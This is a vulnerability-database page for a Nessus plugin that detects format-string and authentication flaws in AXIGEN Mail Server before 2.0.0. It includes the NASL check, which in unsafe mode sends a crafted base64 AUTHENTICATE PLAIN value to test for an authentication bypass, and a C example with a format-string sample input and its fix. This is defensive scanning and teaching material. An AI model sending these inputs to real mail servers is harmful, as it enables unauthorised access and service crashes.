AXIGEN Mail Server < 2.0.0 Multiple Remote Vulnerabilities

Published: 09 Feb 2007 00:00:00
Reported by: Tenable
Type: nessus
Source: www.tenable.com

AXIGEN Mail Server < 2.0.0 contains multiple remote vulnerabilities, including a format string vulnerability in the POP3 server and denial-of-service issues in the IMAP server

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Tenable Nessus | AXIGEN Mail Server IMAP Server Multiple Authentication Methods DoS | 9 Feb 2007 00:00 | nessus |
| CVE | CVE-2007-0886 | 12 Feb 2007 23:00 | cve |
| CVE | CVE-2007-0887 | 12 Feb 2007 23:00 | cve |
| Cvelist | CVE-2007-0886 | 12 Feb 2007 23:00 | cvelist |
| Cvelist | CVE-2007-0887 | 12 Feb 2007 23:00 | cvelist |
| NVD | CVE-2007-0886 | 12 Feb 2007 23:28 | nvd |
| NVD | CVE-2007-0887 | 12 Feb 2007 23:28 | nvd |
| Prion | Integer overflow | 12 Feb 2007 23:28 | prion |
| Prion | Design/Logic Flaw | 12 Feb 2007 23:28 | prion |
| securityvulns | Axigen Mail Server DoS | 8 Feb 2007 00:00 | securityvulns |

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(24321);
  script_version("1.26");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2007-0886", "CVE-2007-0887");
  script_bugtraq_id(22473, 22603);
  script_xref(name:"EDB-ID", value:"3289");
  script_xref(name:"EDB-ID", value:"3290");
  script_xref(name:"EDB-ID", value:"3329");

  script_name(english:"AXIGEN Mail Server < 2.0.0 Multiple Remote Vulnerabilities");

  script_set_attribute(attribute:"synopsis", value:
"The remote mail server is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote host is running AXIGEN Mail Server, a messaging system for
Linux and BSD. 

The POP3 server component of AXIGEN Mail Server contains a format
string vulnerability because it calls syslog() when logtype is set to
'system'.  In addition, the IMAP server component is affected by two
denial of service issues involving PLAIN and CRAM-MD5 authentication
methods.  An unauthenticated, remote attacker can leverage these issues
to crash the IMAP service and possibly execute arbitrary code
remotely.");
  script_set_attribute(attribute:"see_also", value:"http://www.axigen.com/forum/showthread.php?p=2386#post2386");
  script_set_attribute(attribute:"solution", value:
"Upgrade to AXIGEN Mail Server version 2.0.0 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/02/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/02/09");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:gecad:axigen_mail_server");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.");

  script_dependencies("find_service1.nasl");
  script_require_ports("Services/imap", 143);

  exit(0);
}


include("imap_func.inc");
include("misc_func.inc");


# Check the imap server.
port = get_service(svc:"imap", default: 143, exit_on_fail: 1);
if ( get_kb_item("imap/"+port+"/false_imap")
  || get_kb_item("imap/"+port+"/overflow")) exit(0);

# Make sure it's AXIGEN.
banner = get_imap_banner(port:port);
if (!banner || " AXIGEN " >!< banner)
  exit(0, "The IMAP server on port "+port+" is not AXIGEN.");


# If safe checks are enabled...
if (safe_checks())
{
  if (egrep(pattern:" AXIGEN ([0-1]\..*|2\.0\.0-beta1) ", string:banner))
  {
    report = string(
      "Nessus has determined the flaw exists with the application\n",
      "based only on the version in the IMAP server's banner.\n"
    );
    security_hole(port:port, extra:report);
  }
}
# Otherwise...
else
{
  # Establish a connection.
  tag = 0;
  soc = open_sock_tcp(port);
  if (! soc) exit(1, "Cannot connect to TCP port "+port+".");

  # Read banner.
  s = recv_line(socket:soc, length:1024);
  if (strlen(s))
  {
    # Start to log in.
    ++tag;
    c = string("nessus", string(tag), " AUTHENTICATE PLAIN");
    send(socket:soc, data:string(c, "\r\n"));
    s = recv_line(socket:soc, length:1024);
    if ("+ data" >< s)
    {
      # Send the exploit to see if we can bypass authentication.
      #
      # nb: this will likely cause existing connections to be dropped.
      c = base64(str:raw_string("*", 0));
      send(socket:soc, data:string(c, "\r\n"));
      s = recv_line(socket:soc, length:1024);

      # There's a problem if we were able to authenticate.
      if ("OK Done AUTHENTICATE" >< s) security_hole(port);
    }
    close(soc);
  }
}
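
The plugin description above attributes the POP3 flaw to a syslog() call made when logtype is set to 'system'. As an added illustration (not AXIGEN's or Tenable's code), this C example shows that bug class next to its fix, plus a small audit helper; the function names, the logtype enum and the log text are hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Hypothetical log back ends, modelled on the 'logtype' setting. */
enum logtype { LOGTYPE_FILE, LOGTYPE_SYSTEM };

/* Vulnerable form, shown as a comment only and never compiled:
 *     syslog(LOG_INFO, client_text);
 * client_text becomes the format string, so syslog() interprets any
 * conversion specifier the client sent. */

/* Audit helper: 1 if s would act as a format string (contains '%'
 * not followed by a second '%'), 0 if it is plain text. */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }  /* "%%" is a literal percent */
        return 1;                            /* "%x", "%n" or a dangling '%' */
    }
    return 0;
}

/* Build the log line with a constant format; client text is only data. */
int render_log_line(char *out, size_t n, const char *client_text)
{
    return snprintf(out, n, "POP3 client sent: %s", client_text);
}

/* Hardened logger: both back ends receive a constant format string. */
int log_event(enum logtype t, const char *client_text)
{
    char line[512];
    int len = render_log_line(line, sizeof line, client_text);
    if (t == LOGTYPE_SYSTEM)
        syslog(LOG_INFO, "%s", line);
    else
        fprintf(stderr, "%s\n", line);
    return len;
}

int main(void)
{
    const char *sample = "USER %x%x%n";   /* constructed sample input */
    printf("directive present: %d\n", has_format_directive(sample));
    return log_event(LOGTYPE_FILE, sample) > 0 ? 0 : 1;
}
```

Building with -Wformat -Wformat-security makes the compiler flag the commented-out vulnerable form wherever it appears in real code.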

11 Apr 2022 00:00 (Current)
Vulners AI Score: 6 (Medium risk)
CVSS 2: 10
EPSS: 0.26722